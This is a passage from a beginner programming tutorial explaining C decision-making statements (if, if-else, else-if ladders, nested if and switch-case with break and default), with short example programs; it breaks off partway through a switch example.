object, if correctly declared, will render in the card. Just make sure to supply a data type and label as well. For example, we could get our "description" property into the card like this: { "results": [ { "objectId": 1, "title": "Test object one", "properties": { "label": "Description", "dataType": "STRING", "value": "The first test object" } } ] } Some data types require additional information. For example, monetary values require a "currencyCode" key: { "results": [ { "objectId": 1, "title": "Test object one", "properties": { "label": "Price", "dataType": "CURRENCY", "value": "100.00", "currencyCode": "USD" } } ] } HubSpot provides documentation for all data types. This method of getting properties into your card requires more work on the backend and careful building of your JSON objects, but it allows you to add, change, or reorder properties however you like without needing to fuss with the "Card properties" tab. PART II - Rendering the Card I was stuck at this stage for a long time. Creating the card and app had gone fine, but what now? According to HubSpot's documentation, I needed to "install the app," which involved configuring OAuth and creating a "redirect URL." Wait, what? Why did I need OAuth when I'm using these cards in the HubSpot dashboard that I am already logged into? Why did I need a URL that would redirect me to... where? I'm already in my HubSpot dashboard, which is where I want to be. This is the piece I was missing: Although HubSpot apps get *installed* in your HubSpot account, they *run* somewhere else. Now in my case, I only wanted to do one, singular thing: render some cards in my HubSpot dashboard. But that was unusual. Most of the time, HubSpot apps are more than just a support system for CRM cards. Most HubSpot apps are integrations that run inside other pieces of software like Gmail, Wordpress, or Slack. They authenticate themselves with OAuth so that they can then make API calls to HubSpot. This was hard for me to see, because I only wanted to make API calls from HubSpot via the custom CRM cards. And the truth is that technically, for my purposes, I shouldn't have needed an app. I had no wish to pull HubSpot data into some other piece of software. But although my needs were simple, I still had to follow the rules of HubSpot's app integrations. That's the only way it works. I needed to create an app, even if it didn't do anything. Okay, we've created our app and configured its CRM cards. Now it's time to connect the app to our HubSpot console. However, according to their documentation, we learn that "Apps can’t be installed on developer accounts." I suppose a developer account is fundamentally different from a regular HubSpot account, so in order to test the app, HubSpot recommends that you create a test account. Let's do that. Go back to your developer account's home page, click on "Manage test accounts" and click "Create test account." Once the account is created, click the "Contacts" button in the top nav and then select "Contacts" (again) from the drop-down menu. Note that the test account comes with a couple of preprogrammed test contacts. Now go back again to your developer account's home page and click on "Manage apps" (see fig. 2, above). Click on the app you created above, and select "basic info" from the left-hand nav. This should bring up a UI with two tabs: "App info" and "Auth." Select the "Auth" tab. You should now be looking at the "Auth settings" (fig. 5). Figure 5 At the top is the "App credentials" section, which contains fields for "App ID," "Client ID" and "Client Secret." Those three values should all be filled in. You'll want to keep track of the "Client ID" and "Client Secret" values, because we're going to use them in just a little bit. Below those are fields labeled "Install URL - OAuth" (sometimes also referred to as the "Authorization URL") and "Redirect URL," which will be blank. We must now go through the OAuth process as described. That page breaks the OAuth process down into five steps, and ends with the note "Your app will not appear as a Connected App in a user's Integration Settings unless you complete the first two of these steps. You must generate the refresh token and initial access token to have the app appear as 'connected.'" In fact, we're going to complete the first three steps, but then we will stop. Now let's deal with the "Install URL" and "Redirect URL" fields. It looks like you should be able to type directly into the "Install URL" field, but you can't. You populate this field by typing something into the "Redirect URL" and then saving the form. And what should you type in there? This should be a URL to a destination on your server - probably the same server that you will use to serve the API that will populate the CRM cards. All the code at that URL needs to do is make a POST request. For example, the one I made in Django looks like this: import requests from django.http import HttpResponse def hubspot_oauth(request): requests.post("", data = { "grant_type": "authorization_code", "client_id": "<client id from Hubspot dashboard>", "client_secret": "<client secret from Hubspot dashboard>", "redirect_uri": request.build_absolute_uri(), "code": request.GET.get("code") }) return HttpResponse() HubSpot provides an example as well. Regarding these values: the "grant_type" needs to be the literal string "authorization_code." The values for "client_id" and "client_secret" come from the "Client ID" and "Client secret" values we noted above. The value for "redirect_uri" is simply the redirect URL you just created, and should also match what is in your HubSpot app console. I don't know why the request needs to send back its own URL, but it needs to be there. Finally, the "code" is a value sent in the querystring of the incoming request, which will come from HubSpot, as we will see... So code up something that will make a POST request like the one above, and paste the URL where that code is located into the "Redirect URL" field. Now save the form. After the save, the "Install URL" field will be populated. There should be a button next to the "Install URL" field labeled "Copy full URL." Click it. Now paste the URL you just copied into your browser. You should be presented with a list of accounts to connect the app to. At a minimum this list will contain your developer account and your test account. Select the test account by clicking on its name. You may have to confirm that you want to connect your account to this "unverified" app. When you click "confirm," a request will be sent from HubSpot to your redirect URL. The request's querystring will contain the "code" parameter that is incorporated into the POST request sent back to HubSpot, and with that, the installation is complete. If, as in the example above, your redirect URL returns nothing but an empty http response, you will find yourself looking at a blank page. But now go to the test account dashboard, navigate to the "Contacts" section, and select a contact. You should see your custom card in the lower-right corner. You should also see a data fetch request coming into your API endpoint every time the page is loaded. The request should include a querystring that contains a parameter "hs_object_id" and the HubSpot id of the contact in the page where the card was rendered. CONCLUSION HubSpot's custom CRM cards offer a really cool piece of functionality. Unfortunately, HubSpot's documentation only seems to regard them as a small part of a larger integration running in some external code. This can be confusing to developers unfamiliar with HubSpot, especially if their goal is only to make use of the cards without an integration. - More information on CRM card properties (under "Webhooks" tab) - More information on OAuth and HubSpot NOTE: The author wishes to thank Lance Erickson for his insights into the CRM cards and the HubSpot universe in general. He works on the data team at "When I Work."
https://imagescape.com/blog/using-hubspots-custom-crm-cards-without-an-integration/
CC-MAIN-2022-05
refinedweb
2,444
71.24
Hello, and thank you for taking the time to help me! I am working on a program that reads a string after the option "E" (enter a string) is chosen, and checks if parentheses (), brackets [], and braces {} are matched in it. There are two files, the main driver file, called Assignment8.cpp, and the utility file, MatchChecker.h. The header file has one class, the MatchChecker class, described below. The MatchChecker class is a utility class that will be used to check if parentheses (), brackets [], and braces {} are matched in a given string. The MatchChecker class object will never be instantiated. It must have the following public function: static string matchChecker(string lineToCheck) The matchChecker function's argument will be a string that can contain parenthesis, brackets, and braces. Other characters or numbers can appears before/after/between them. If all of them are matched, then the function should return the string: "Everything is matched!" If there is a closing parenthesis, bracket, or brace that does not have its corresponding opening parenthesis, bracket, or brace, then for the first such character, return a string with its position such as: ") at the position 15 does not match."/"] at the position 12 does not match."/"} at the position 28 does not match." The first character of the string is seen as the position 0. If there is no matching closing parenthesis, bracket, and brace when you reach the end of the string after checking each character, return a string notifying the last opening parenthesis, bracket, or brace that did not have its matching closing one as: ") is missing."/"] is missing."/"} is missing." Requirements: You need to implement this function using the stack using stack.h in C++ STL(Standard Template Library). You can use the string "A" as a token for parentheses, "B" as a token for brackets, "C" as a token for braces. So, as you can see, its not a very complex program, but I have never worked with stacks before, so its rough for me. I have a good amount of the code written, and everything is compiling fine, but when I enter a string and then press the Enter key, the program has an error and Windows forces me to terminate the program. Here my files, and they are also attached so that you can run them if you want. Code:// Assignment #: 8 // Name: Your name // EmailAddress: // Description: It displays a menu of choices to a user // and performs the chosen task. It will keep asking a user to // enter the next choice until the choice of 'Q' (Quit) is entered. #include <iostream> #include "MatchChecker.h" using namespace std; void printMenu(); int main() { char input1; string line; string inputInfo; MatchChecker checker1; printMenu(); do // will ask for user input { cout << "What action would you like to perform?" << endl; cin >> input1; cin.ignore(30, '\n'); // matches one of the case statements switch (input1) { case 'E': //Enter String cout << "Please enter a string.\n"; getline(cin, inputInfo, '\n'); checker1.matchChecker(inputInfo); break; case 'Q': //Quit break; case '?': //Display Menu printMenu(); break; default: cout << "Unknown action\n"; break; } } while (input1 != 'Q' && input1 != 'q'); return 0; } /** The method printMenu displays the menu to a user**/ void printMenu() { cout << "Choice\t\tAction\n"; cout << "------\t\t------\n"; cout << "E\t\tEnter String\n"; cout << "Q\t\tQuit\n"; cout << "?\t\tDisplay Help\n\n"; }Code:#include <stdio.h> #include <sstream> #include <string> #include <stdexcept> // protections #ifndef MatchChecker_H #define MatchChecker_H using namespace std; class MatchChecker { public: static string matchChecker(string lineToCheck) { Stack<Character> myStack = new Stack<Character>(); for (int j = 0; j < input.length(); j++) { char ch = input.charAt(j); switch (ch) { case '{': case '[': case '(': theStack.push(ch); break; case '}': case ']': case ')': if (!theStack.isEmpty()) { char chx = theStack.pop(); if ((ch == '}' && chx != '{') || (ch == ']' && chx != '[') || (ch == ')' && chx != '(')) cout << "Error: " << ch << " at the position " << j << " does not match" << endl; } else cout << "Error: " << ch << " at the position " << j << " does not match" << endl; break; default: break; } } if (!theStack.isEmpty()){ cout << "Error: missing right delimiter" << endl; } }; #endif
https://cboard.cprogramming.com/cplusplus-programming/120524-problem-program-check-if-separators-match.html
CC-MAIN-2017-26
refinedweb
667
72.56
The SQL injection is a set of SQL commands that are placed in a URL string or in data structures in order to retrieve a response that we want from the databases that are connected with the web applications. This type of attacksk generally takes place on webpages developed using PHP or ASP.NET. An SQL injection attack can be done with the following intentions − To modify the content of the databases To modify the content of the databases To perform different queries that are not allowed by the application This type of attack works when the applications does not validate the inputs properly, before passing them to an SQL statement. Injections are normally placed put in address bars, search fields, or data fields. The easiest way to detect if a web application is vulnerable to an SQL injection attack is by using the " ‘ " character in a string and see if you get any error. In this section, we will learn about the different types of SQLi attack. The attack can be categorize into the following two types − In-band SQL injection (Simple SQLi) Inferential SQL injection (Blind SQLi) It is the most common SQL injection. This kind of SQL injection mainly occurs when an attacker is able to use the same communication channel to both launch the attack & congregate results. The in-band SQL injections are further divided into two types − Error-based SQL injection − An error-based SQL injection technique relies on error message thrown by the database server to obtain information about the structure of the database. Union-based SQL injection − It is another in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response. In this kind of SQL injection attack, attacker is not able to see the result of an attack in-band because no data is transferred via the web application. This is the reason it is also called Blind SQLi. Inferential SQL injections are further of two types − Boolean-based blind SQLi − This kind of technique relies on sending an SQL query to the database, which forces the application to return a different result depending on whether the query returns a TRUE or FALSE result. Time-based blind SQLi − This kind of technique relies on sending an SQL query to the database, which forces the database to wait for a specified amount of time (in seconds) before responding. The response time will indicate to the attacker whether the result of the query is TRUE or FALSE. All types of SQLi can be implemented by manipulating input data to the application. In the following examples, we are writing a Python script to inject attack vectors to the application and analyze the output to verify the possibility of the attack. Here, we are going to use python module named mechanize, which gives the facility of obtaining web forms in a web page and facilitates the submission of input values too. We have also used this module for client-side validation. The following Python script helps submit forms and analyze the response using mechanize − First of all we need to import the mechanize module. import mechanize Now, provide the name of the URL for obtaining the response after submitting the form. url = input("Enter the full url") The following line of codes will open the url. request = mechanize.Browser() request.open(url) Now, we need to select the form. request.select_form(nr = 0) Here, we will set the column name ‘id’. request["id"] = "1 OR 1 = 1" Now, we need to submit the form. response = request.submit() content = response.read() print content The above script will print the response for the POST request. We have submitted an attack vector to break the SQL query and print all the data in the table instead of one row. All the attack vectors will be saved in a text file say vectors.txt. Now, the Python script given below will get those attack vectors from the file and send them to the server one by one. It will also save the output to a file. To begin with, let us import the mechanize module. import mechanize Now, provide the name of the URL for obtaining the response after submitting the form. url = input("Enter the full url") attack_no = 1 We need to read the attack vectors from the file. With open (‘vectors.txt’) as v: Now we will send request with each arrack vector For line in v: browser.open(url) browser.select_form(nr = 0) browser[“id”] = line res = browser.submit() content = res.read() Now, the following line of code will write the response to the output file. output = open(‘response/’ + str(attack_no) + ’.txt’, ’w’) output.write(content) output.close() print attack_no attack_no += 1 By checking and analyzing the responses, we can identify the possible attacks. For example, if it provides the response that include the sentence You have an error in your SQL syntax then it means the form may be affected by SQL injection.
https://www.tutorialspoint.com/python_penetration_testing/python_penetration_testing_sqli_web_attack.htm
CC-MAIN-2020-34
refinedweb
851
60.65
Thread 1998.06.10 15:00 "TIFFGetField syntax and use", by Steve Garcia I want to retrieve the value of the tag's PHOTOMETRIC and BITSPERSAMPLE. I'm presuming that it is easiest to use the TIFFGetField function to do this, but I'm not having any real success. I'm using tiff-v3.4. I'm not sure I understand the syntax of the function properly. My code (truncated for e-mail purposes) is as follows: #include <tiffio.h> int photo, bitspersample; main () { TIFF *tif = TIFFOpen("myfile.tif", "r"); TIFFGetField(tif, TIFFTAG_PHOTOMETRIC, photo); TIFFGetField(tif, TIFFTAG_BITSPERSAMPLE, bitspersample); printf("Photo = %d, Bits/Sample = %d", photo, bitspersample); TIFFClose(tif); } Now I know I'm getting the memory address when I print out the "photo" and "bitspersample", yet I can't seem to retrieve the actual value that the Tags contain. Any suggestions? First major C program I'm trying to write (still a novice at this) but I really like this programming stuff. Thanks for any suggestions! Steve /\ /^\ Steven Garcia Graduate School, Bioengineering /^^\ /^^^\ steveg@engin.umich.edu Univ. of Michigan / \/^\ / \ / \ \/ \ / \ \ \ "I AM the last one!" - Dragonheart
https://www.asmail.be/msg0054715595.html
CC-MAIN-2022-33
refinedweb
185
56.76
[ ] Daniel Kulp commented on CXF-7458: ---------------------------------- You are going to need to create a test case for this. We have a test in the code already: and if I change from threshold=1 to 1000000 then the parts are all inlined. I also tried moving the @MTOM annotation onto the impl instead of the interface, but that didn't change anything, it still behaved properly. In anycase, this is not something I can reproduce. > JAXWS : MTOM threshold value is ignored > --------------------------------------- > > Key: CXF-7458 > URL: > Project: CXF > Issue Type: Bug > Components: JAX-WS Runtime > Affects Versions: 3.1.6 > Environment: Wildfly 10.1 > Reporter: Balu S > > The webservice is defined as MTOM enabled with threshold value as 5MB, but still the attachments (in responses) that are less than 5MB are not inlined. It looks like if `@MTOM` is enabled, the response is always returned as XOP (multipart) and ignores the threshold value. > {quote}{@HandlerChain(file="/handler-chain.xml") > @MTOM(threshold=5242880) // 5MB limit for inline soap attachements else MTOM > public class WSImpl {. }{quote} -- This message was sent by Atlassian JIRA (v6.4.14#64029)
http://mail-archives.apache.org/mod_mbox/cxf-issues/201707.mbox/%3CJIRA.13090745.1501238540000.37585.1501253400239@Atlassian.JIRA%3E
CC-MAIN-2018-05
refinedweb
183
63.19
Jacob first introduced Machine.Migrations over a year ago. Since then, it’s been a solid part of our process and we’re up to nearly 500 migrations with it on one project. Recently, I finally got around to making some changes I’ve been wanting to make and I wanted to call’em out: - We split the repostiory out to its own on github. I did this similar to the way I did it for MSpec some time ago. Again, the advantage here is that change logs are localized to the project rather than the entire machine overarching project. - I added complaints if you have multiple migrations with the same number. This silently caused problems before as one of the migrations would not get applied. Now it just yells and dies like a good app. Of course, this is not as important because of the next change. Next I added support for timestamped migrations. This helps immensely on active projects with multiple developers. You don’t have to deal with communicating migration numbers to the team when you add them, you just generate a new one and merge it when you feel like it. We actually had half of our topic on Campfire dedicated to our current migration number. The other half was who owed how many pushups for breaking the build. Here’s the rake task we use to generate a new migration: namespace :new do task :migration do raise "usage: rake new:migration name=\"Your migration name\"" unless ENV.include?('name') name = ENV['name'] filepath = "db/migrate/#{Time.now.strftime('%Y%m%d%H%M%S')}_#{name.gsub(/ /,'_')}.cs" text = File.read("db/migrate/template.cs") File.open(filepath, 'w') { |file| file.puts text.gsub(/\$MigrationName\$/,"#{name.gsub(/ /,'_')}") } end end Usage is simple, just create a template.cs in the directory (we use db/migrate) and then type rake new:migration name="this is my migration name" Example template: using System; using System.Collections.Generic; using System.Text; using Machine.Migrations; public class $MigrationName$ : SimpleMigration { public override void Up() { throw new System.NotImplementedException(); } public override void Down() { throw new System.NotImplementedException(); } } Finally, I added a command line runner. As we’ve grown more and more sick of msbuild and more and more fond of rake, we’ve wanted to slowly all but eliminate our dependency on MSBuild. The command line tool is quite simple: Machine.Migrations Copyright (C) 2007, 2008, 2009 Machine Project c, connection-string Required. The connection string to the database to migrate t, to Applies or unapplies migrations to get to the specified migration u, up Applies migrations to the latest s, scope The scope? d, directory Required. Directory containing the migrations v, compiler-version Version of the compiler to use debug Show Diagnostics r, references Assemblies to reference while building migrations separated by commas t, timeout Default command timeout for migrations ?, help Display this help screen The only two flags you usually need are -c and -d. Just pass in the connection string and the location of your migrations. Be sure to quote them: migrate.exe -c “my connection string” -d “my migration directory”. Hopefully these changes help others. Grab the latest here and just msbuild the sln to build it. I do wonder though, what other active .NET migration projects are people using and how do you like them?
http://codebetter.com/aaronjensen/2009/10/24/machine-migrations-changes/
CC-MAIN-2021-43
refinedweb
560
58.58
Windows Azure SQL Database Marketplace We are excited to announce that the Windows Azure Service Bus is now part of the new Windows Azure portal. In addition to existing features that enable you to manage Service Bus entities, we are introducing new portal features with the October 2012 release of the Service Bus. The new features include: We revisited the overall portal experience and optimized it around the most common scenarios, enabling faster access to entity data and management operations. Let’s start with the most common scenarios. We optimized the portal’s experience around scenarios that any new Service Bus user would go through; and creating new namespaces and entities is one of them. The Quick Create experience is designed to help you create a new entity (queue, topic, or relay) in one easy step, even if you don’t have a pre-created service namespace. You provide a name for the entity (e.g. name of the queue), select the region and the Windows Azure subscription (in the case of multiple subscriptions) to be used, and the namespace under which this entity is created. If you don’t have an existing namespace, you are asked to provide a name for one. If you have a single pre-existing namespace, the entity is created under it. In the case of multiple namespaces, you can select one of them. Your entity is ready to use once you get the “success” message at the bottom of the page. Your entity is created with the default parameters, such as the message’s time-to-live (TTL) value, as specified in the Service Bus official documentation. Generally, Quick Create allows you to create top level entities: queues, topics, and relays. An important point to note: the relays Quick Create does not create an actual relay endpoint. It creates a service namespace for you as a container of this relay endpoint. You must still create relays programmatically using our APIs. You can read more about that here. Custom Create is the more detailed version that gives you knobs to change the default values of the properties of the entity (queue or topic) being created. You can still select a pre-created namespace or create a new one using the custom create scenario. We don’t yet support updating the properties of messaging entities. So, once you create a queue or topic, you cannot change any of its properties. You can still change its status, which will be explained below. A new feature being introduced in the Windows Azure Service Bus is the ability to change the status of a messaging entity (queue, topic, or subscription) that enables the entity to send or receive messages. Now you can suspend a queue, topic, or a subscription. A sender cannot send messages to a suspended entity. Also, other applications and devices cannot receive messages from this entity. The new Windows Azure portal allows you to change the state of an entity to either Resume or Suspended. With the new portal, you get a comprehensive and timely view of the status your queues and topics. You can also monitor their usage. This is a major new feature we have introduced in the new Windows Azure portal. You can now see activities on queues, topics, subscriptions, or relays that you’ve created. You can view this information over multiple time windows: the last hour, the last 24 hours, 7 days, or the last 30 days. You can see data with a precision as low as 5-minute measurement points for the one hour window, 1 hour for the 24-hour window, and 1 day for the 7 and 30-day windows. For any queue, you can see charts of: - Incoming Messages: number of messages queued during this time interval.- Outgoing Messages: number of messages de-queued during this time interval.- Length: number of messages in the entity at the end of this time interval.- Size: storage space (in MB) being used by this entity at the end of this time interval. Under “quick glance” on the dashboard, we reflect the current size of the queue as Queue Length amongst other pieces of information. This information is refreshed every 10 seconds. Another very useful piece of information is the View Connection String link. It provides the connection string to that entity’s namespace, which you can then use in your code to create a queue or topic client. A topic dashboard is fairly identical, except for the usage metrics. Outgoing messages and length are not present in the topic dashboard, as that information would be different for each of the subscriptions for a topic. The Monitor tab enables you to add usage metrics (number of outgoing messages and length), per topic subscription. To add these metrics, click on add metrics at the bottom of the page, and then choose from the subscriptions under the topic. Going forward, we will be enriching our story for better management, monitoring and diagnostics of Service Bus entities by adding more features. New features will include a namespace dashboard for aggregated views, a dashboard for subscriptions on every topic, additional metrics, the ability to update entity properties, and more. We are definitely interested in hearing from you what more should be done -- so please leave comments with suggestions! The current portal will continue to work side-by-side with the new portal. It is now in maintenance mode, so we won’t be adding any new features. However, any changes you make to your Service Bus entities will be reflected in both places. Let us know what you think of our new portal. We will be more than glad to get your feedback for missing features and/or possible improvements.
http://blogs.msdn.com/b/windowsazure/archive/2012/10/08/introducing-a-new-user-experience-for-windows-azure-service-bus.aspx
CC-MAIN-2013-20
refinedweb
955
62.38
<< Caleb KleveterTreehouse Moderator 37,862 Points Method returns with hashes and arrays. I feel like I should be writing more code, but I'm not sure. Here is the instructions (I'm on step 1): "Modify the "create_shopping_list" method to return a hash with the following keys and values: 'title': A string with the value "Grocery List" 'items': An empty array" shopping_list.rb def create_shopping_list puts "Title: " + "Grocery List" puts "Items: " + [].to_s end 2 Answers Jose Rosado3,090 Points Caleb, Remember that create_shopping_list method should return a Hash. def create_shopping_list # hashes are created with brackets {}. E.G: new_hash = {} hash = { "title" => "Grocery List", # this is a key / value pair. In this case, "title" is the key and "Grocery List" is the value "items" => [] # the key 'item' is an empty array. } end Jose Rosado3,090 Points Jose Rosado3,090 Points Also, you can use numbers and symbols as the key. Read this to understand Hashes better.
https://teamtreehouse.com/community/method-returns-with-hashes-and-arrays
CC-MAIN-2022-33
refinedweb
154
73.58
Parallel Programing - Exotic_Devel Parallel programing is a ancient subject. But still not very used (my opinion). At a simple desktop application (connection with database, sales and purchases), whats the benefits can provide the parallel programing? - SGaist Lifetime Qt Champion Hi, When you say parallel programming, do you mean multithreading ? - Exotic_Devel Yes, I know it the parallel programing provide benefice related to performance. But to a simple desktop app (sales, ...), is there a benefice? - SGaist Lifetime Qt Champion The only answer is: it depends. It's really use case based. Threads are not the answer to all e.g. you can do much things asynchronously with Qt. - JKSH Moderators Parallel processing helps if you have functions that take a long time to return (for example, if your database queries take 5 seconds). In this example, your GUI will freeze if you use 1 thread only. Having said that, you might be able to optimize your program in other ways (for example, you could rewrite your SQL query to be more efficient). If you can make your functions return faster, then you don't need parallel programming. @Exotic_Devel said: Yes, I know it the parallel programing provide benefice related to performance. Not always. If you use it wrongly, you can get worse performance. Hi, as @JKSH said multi-threading programming helps only if your algorithm can be parallelized. Keep in mind that if you use multiple threads you MUST synchronize the access to shared data so, sometimes, make no-sense use threads instead of working with a single thread and asyncrhonous mode - Meyer Sound @mcosta in response to 'MUST synchronize the access to shared data', this is not the only method. There is the 'lock free queue' concept, but as this can be troublesome, and usually only considered as an optimization. I see it coming up in the world of audio plugin development, but I'm sure there are other performance bound contexts. @Meyer-Sound You're right. sometimes synchronization is not the only way. BTW my concept was that multi-thread programming is NOT the best solution to solve every problem. Keep in mind that creating sub-process or threads consumes resources and sometimes this is a problem. In the original example from @Exotic_Devel (DB connections for simple sales and purchases) you can easly manage all the work with the standard Qt asynchronous mode - stereomatchingkiss The other example is when you are trying to rename a lot of files, since I/O is very very slow, you would not like this kind of operations to "freeze" your UI. To give the users a feeling that your UI still "alive", you can create a thread to rename the files, and update the QProgressBar. The chapter 8 of the book "advanced Qt programming", will show you how to do it.
https://forum.qt.io/topic/53259/parallel-programing/6
CC-MAIN-2019-18
refinedweb
467
63.39
Dialogs attached to ToolData plugins never freed ? On 26/05/2013 at 14:54, xxxxxxxx wrote: Hi, Is it true that a GeDialog attached to a ToolData instance is never freed ? While AllocSubDialog() is called each time the tool is raised I could not manage to get __del__ being called for my GeDialog instance. I of course made sure that I do not store a reference to the dialog in my tools instance, like you do it normally. def AllocSubDialog(self, startbc) : # might look funny but is the same as - return someclass.__init__() return self.DialogType(host = self) Also AskClose() and DestroyWindow are never called, it seems that dialog continues to exists internally. Normally you might prefer this behaviour or do not care about it, but for me it is currently a bit annoying. I just need to fetch the moment when dialog is closing. On 26/05/2013 at 15:53, xxxxxxxx wrote: I don't know why it is not called (I also didn't test it), but you can override ToolData.FreeTool(). -Nik On 26/05/2013 at 17:21, xxxxxxxx wrote: This is the second time you've said that "ToolData plugins have a GeDialog attached to them". But what I see in the docs is that ToolData plugins have a sub dialog you can use with them: AllocSubDialog(self, bc) Not a GeDialog. Where did you get the idea that a ToolData plugin has a Gedialog attached to it? I'm not seeing that in the docs. -ScottA On 27/05/2013 at 01:02, xxxxxxxx wrote: SubDialog is a subclass of GeDialog. And it doesn't implement anything new. On 27/05/2013 at 03:06, xxxxxxxx wrote: Originally posted by xxxxxxxx I don't know why it is not called (I also didn't test it), but you can override ToolData.FreeTool(). -Nik the problem is, you can close a tools dialog without closing (freeing) the tool. if you try then to invoke methods on the tools dialog, c4d crashes (even if you do make the dialog a tools class member to keep it alive). not sure about the internal reasons for that, but at least GeDialog.DestroyWindow() should be called on closing tool dialogs (as the cpp docs imply). On 27/05/2013 at 03:27, xxxxxxxx wrote: Ah yes, I remember this when I implemented a Python tool! I'm not sure how I got to know when the dialog was not visible anymore back then, but what I know is, that the reference to the dialog was not valid anymore and therefore Cinema crashed or you got invalid data. I cached the parameters using a small tool I wrote, and now I have it implemented in c4dtools.misc.dialog. Maybe you want to check it out, it is very useful. It enables you to retrieve all values of a dialog in a BaseContainer or a dictionary, and also allows you to set the values back via a BaseContainer or dictionary. Here's an excerpt from a plugin where I used it in. In this code, I used it to save and load the parameters of the dialog to keep the configuration even when you restarted Cinema. You can use this to cache your symbols of course. import c4d import c4dtools from c4dtools.misc.dialog import DefaultParameterManager res, _ = c4dtools.prepare() class MainDialog(c4d.gui.GeDialog) : def __init__(self) : super(MainDialog, self).__init__() self.params =) p.add('remove_empty', res.CHK_REMOVEEMPTYNULLS, 'b', True) p.add('preserve_names', res.CHK_PRESERVENAMES, 'b', True) p.add('remove_normaltags', res.CHK_REMOVENORMALTAGS, 'b', True) p.add('remove_uvwtags', res.CHK_REMOVEUVWTAGS, 'b', True) p.add('align_normals', res.CHK_ALIGNNORMALS, 'b', True) p.add('norm_projection', res.CHK_NORMALIZEPROJECTION, 'b', True) # Just a helper I used, I could now access parameters using # self.v_optimize to get the value associated with the name "optimize" # in the DefaultParameterManager. def __getattr__(self, name) : if name.startswith('v_') : name = name[2:] return self.params.get(self, name) else: return getattr(super(MainDialog, self), name) def CreateLayout(self) : return self.LoadDialogResource(res.DLG_MAIN) def InitValues(self) : self.params.set_defaults(self) # Load a BaseContainer with all the parameters of the dialog. config = load_dialog_config() self.params.load_container(self, config) return True def DestroyWindow(self) : config = self.params.to_container(self) save_dialog_config(config) -Nik On 27/05/2013 at 03:44, xxxxxxxx wrote: the problem is not accessing dialog parameters, my dialog base class has already bc based parameter solution it is passing on each update to its host, the ToolData instance. the problem was invoking methods on the dialog from outside of the dialog, but i have solved it now using core messages and keeping all calls on the dialog inside the dialog. but i think the crashing and DestroyWindow() problem should be fixed in python. edit : thanks for your help :) i tend to be a bit grumpy on mondays, so please excuse my grumpy tone :) On 27/05/2013 at 08:51, xxxxxxxx wrote: Originally posted by xxxxxxxx SubDialog is a subclass of GeDialog. And it doesn't implement anything new. Yes. But that does not mean that a GeDialog is "attached" to a ToolData plugin. A SubDialog is available in a ToolData plugin because it was specifically added to it in the SDK by the developers. And was tested by them. The GeDialog was not. Sure we can spawn a GeDialog and force it to work using special messages. We can do that in other types of plugins too. But that's not the way the developers intended us to use the ToolData class. And while it's fun to create our own custom hacks and workarounds for things not in the SDK. I just think its wrong (and dangerous) to say that a GeDialog is attached to a ToolData plugin. -ScottA
https://plugincafe.maxon.net/topic/7210/8252_dialogs-attached-to-tooldata-plugins-never-freed-
CC-MAIN-2020-50
refinedweb
961
57.16
Welcome guys, in this module we are going to talk about what is Decision making statements in C, the most interesting and important topic of this particular series, till now we were limited to a single linear statement, i.e., printing something in console or taking input and printing the same, but programming is not limited till here only, we can do a various interesting thing and also can build the amazing program. So, let’s dive into the journey of this amazing module, What is Decision Making Statements in C? Each Individual instruction of a program is called a C statement like variable declaration, expressions, and all. They all terminate with a semicolon and execute in the same order as they appear in the program. But programs are not limited to this linear sequence, during its execution it may repeat segments of code or may take decisions and all. So, for this purpose C provides a Conditional statement or Decision-making statement that specifies what has to be done and when, and under which circumstances. We all encounter a situation in real life when we need to make a decision, to arrive at a particular result, so that we can proceed with what to do next. Therefore, sometimes the same situation arises in programming also where we have to make some decision in order to achieve the desired result. The decision-making statements are: - if - if-else - else-if ladder - nested if-else - Switch-case What is an if statement in C? It is the simplest of all the decision making a statement in C, like if you have mentioned some condition and if that condition results to be true, then the particular block will be executed, otherwise, that block will be skipped. The syntax for declaring the same is: if (condition) { // executes if the condition is true } Let’s see one example to get more clearer #include <stdio.h> int main( ) { int n; scanf("%d", &n); if (n>5) { printf("Yes"); } return 0; } The output of the above program: If the user enters the number greater than 5, then the particular if block will get executed and will give the desired result, else it will not do anything. What is the if-else Statement in c? It evaluates a single or multiple test expression that results in “TRUE” or “FALSE” and the outcome of this decides which set of blocks is going to be executed based on the condition. When we want to execute a particular block of code if the condition is true and another block of code if the condition is false. The syntax for declaring if-else statement is: if (condition) { // statement } else { // statement } If the condition results to be true, then the statement inside the if block will be executed, and if the condition results will be false, then statements inside the else block will be executed. Let’s take one simple example to get it clearer, Program to find whether the entered number is greater than 10 or not. #include <stdio.h> int main( ) { int num; scanf("%d", &num); if(num>10) { printf("Yes"); } else { ("No"); } return 0; } The output of the above program is: If the user enters the number 12 as input, the output is Yes, and if the user enters the number 9 as input, the output is No. Since it is checking the condition whether the number is greater than 10 or not in the if block and if the condition results to be true, then the if block will be executed, and if the condition fails then the else block will be executed. What is an else-if ladder in C? When we need to list multiple else-if-else statements then that case we have to create an else-if ladder, it is used to check when there is a multiple condition, the syntax for declaring the same is: if (expression 1) { // When expression 1 is true } else if (expression 2) { // When expression 2 is true } else if (expression 3) { // When expression 3 is true } else { // When none of expression is true } When the first Boolean condition becomes true then the first block i.e., if the block gets executed and when the first condition becomes false then the second block is checked with the condition. If the second condition becomes true then the second block gets executed and likewise, it goes on, and if none of the conditions matches to be true, then, in that case, the last else block gets executed. What is nested if-else in C? Nested if-else simply means if inside another if, Yes C allows you to perform nested if-else. It is used when you have to check some condition with respect to another condition, the syntax for declaring nested if-else in C is: if (condition-1) { // when condition–1 is true if (condition–2) { // when condition–2 is true } } What is the switch-case statement in C? The Switch expressions are evaluated once and then the value of that expression is compared to the value of each case. If there is a match, then the associated code block is executed, and if no match found then the default block is executed. It is similar to the if-else statement. The syntax for declaring the switch-case statement is: switch (expression) { case x: // code block break; case y: // code block break; default: // code block } In the above syntax, one expression is provided with the switch statement, and that particular expression is compared with each case, and if the match found with any of the case, then that particular case block will get executed, and if no match found then the default block will be executed. You all must have noticed two keywords i.e., break and default keywords so why that particular keyword is there, let’s see. What is the Break keyword in switch-case? When the C program encounters a break keyword, it breaks out or comes out of the switch block. This means that it will stop the execution of more code and case testing inside that particular block. When a match is found, and the job is done, it’s time for a break and comes out. It saves a lot of time in the execution of the program because it “ignores or leaves” the execution of the rest of the code in the switch block. What is the default Keyword in switch-case? The default keyword specifies some code to run if there is no match found, it should be used at the last of the switch block and it does not need a break. Let us take one example demonstrating, switch-case – #include <stdio.h> int main( ) { int num; scanf("%d", &num); switch(num) { case 1 : printf("Monday"); break; case 2 : printf("Tuesday"); break; case 3 : 